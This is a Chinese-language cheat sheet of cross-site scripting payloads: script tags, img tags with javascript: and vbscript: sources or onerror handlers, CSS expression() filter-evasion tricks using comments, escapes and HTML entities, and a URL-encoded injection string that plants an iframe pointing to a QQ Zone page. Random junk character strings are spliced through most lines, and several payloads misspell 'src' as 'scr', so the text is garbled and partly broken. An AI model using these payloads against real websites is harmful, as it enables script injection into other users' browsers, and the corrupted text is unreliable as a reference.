<script>alert("跨站")</script> (最常用)
3 ]5 m! q* V5 f) l% [4 f Z6 p<img scr=javascript:alert("跨站")></img>; h. h$ l3 i# ]- L
<img scr="javascript: alert(/跨站/)></img>9 N0 J- q5 `* i, C6 H. I" t
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: V4 T/ o/ L: m<img scr="#" onerror=alert(/跨站/)></img># F# Y, S7 e& {; N2 n V) {
<img scr="#" style="xss:expression(alert(/xss/));"></img>
3 H, c$ c* l9 f<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# {/ m. }& n" L6 P4 [* d+ S<img src=vbscript:msgbox ("xss")></img>3 C5 c7 E9 B6 Y" `
<style> input {left:expression (alert('xss'))}</style>
* T. N6 z8 ^8 i, O<div style={left:expression (alert('xss'))}></div>
/ L5 _, N! V) E6 T M<div style={left:exp/* */ression (alert('xss'))}></div>$ M1 Q' u' S2 n# h9 x: M* M4 X* D
<div style={left:\0065\0078ression (alert('xss'))}></div>. }# j8 \$ ^9 [9 p: J8 B' g5 ~3 M
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
5 M( ~, L U, g% E9 f1 W& F, K1 Municode <div style="{left:expRessioN (alert('xss'))}">: S% h; F8 U. z/ f
( l V% @" D3 U"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
* f3 r9 V' D$ h2 K |